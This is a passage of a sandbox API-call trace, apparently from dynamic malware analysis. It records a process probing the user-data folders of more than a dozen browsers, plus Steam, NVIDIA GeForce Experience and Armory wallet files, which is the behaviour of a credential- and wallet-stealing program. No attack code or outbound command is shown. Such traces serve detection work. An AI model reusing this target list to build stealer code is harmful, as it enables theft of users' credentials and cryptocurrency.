ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.018] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.018] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Torch\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data") returned 0x31 [0222.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.018] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data", lpFilePart=0x0) returned 0x30 [0222.018] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.020] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.020] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data") returned 0x40 [0222.020] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.021] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpFilePart=0x0) returned 0x3f [0222.021] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.022] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.023] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data") returned 0x32 [0222.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.023] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data", lpFilePart=0x0) returned 0x31 [0222.023] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.025] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.025] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\360Browser\\Browser\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data") returned 0x3e [0222.025] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.025] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data", lpFilePart=0x0) returned 0x3d [0222.025] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.028] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.028] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Maxthon3\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data") returned 0x34 [0222.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.028] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data", lpFilePart=0x0) returned 0x33 [0222.028] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.030] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.030] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\K-Melon\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data") returned 0x33 [0222.030] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.030] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data", lpFilePart=0x0) returned 0x32 [0222.031] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.032] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.033] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data") returned 0x3b [0222.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.033] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpFilePart=0x0) returned 0x3a [0222.033] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.034] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.035] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.036] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Nichrome\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data") returned 0x34 [0222.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.036] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data", lpFilePart=0x0) returned 0x33 [0222.036] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.038] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.038] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CocCoc\\Browser\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data") returned 0x3a [0222.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.038] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data", lpFilePart=0x0) returned 0x39 [0222.039] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.040] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.040] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Uran\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data") returned 0x30 [0222.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.041] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data", lpFilePart=0x0) returned 0x2f [0222.041] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.043] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.043] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromodo\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data") returned 0x34 [0222.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.043] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data", lpFilePart=0x0) returned 0x33 [0222.043] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.108] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.108] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data") returned 0x38 [0222.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.109] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpFilePart=0x0) returned 0x37 [0222.109] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.111] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.111] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data") returned 0x47 [0222.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.111] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpFilePart=0x0) returned 0x46 [0222.111] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.113] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.113] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Microsoft\\Edge\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data") returned 0x3a [0222.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.113] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data", lpFilePart=0x0) returned 0x39 [0222.114] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.116] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.116] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience") returned 0x4e [0222.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.116] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpFilePart=0x0) returned 0x4d [0222.116] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.118] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.118] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Steam", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam") returned 0x27 [0222.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.118] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam", lpFilePart=0x0) returned 0x26 [0222.119] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.121] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.121] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CryptoTab Browser\\User Data", lpDst=0x36f108, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data") returned 0x3d [0222.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a0) returned 1 [0222.121] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data", lpFilePart=0x0) returned 0x3c [0222.122] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data\\*", lpFindFileData=0x36ef50 | out: lpFindFileData=0x36ef50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef10) returned 1 [0222.165] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0222.165] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Armory", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory") returned 0x2a [0222.165] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory", nBufferLength=0x105, lpBuffer=0x36edb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory", lpFilePart=0x0) returned 0x29 [0222.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f288) returned 1 [0222.165] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory", nBufferLength=0x105, lpBuffer=0x36ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory", lpFilePart=0x0) returned 0x29 [0222.166] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory\\*.wallet", lpFindFileData=0x36f038 | out: lpFindFileData=0x36f038*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 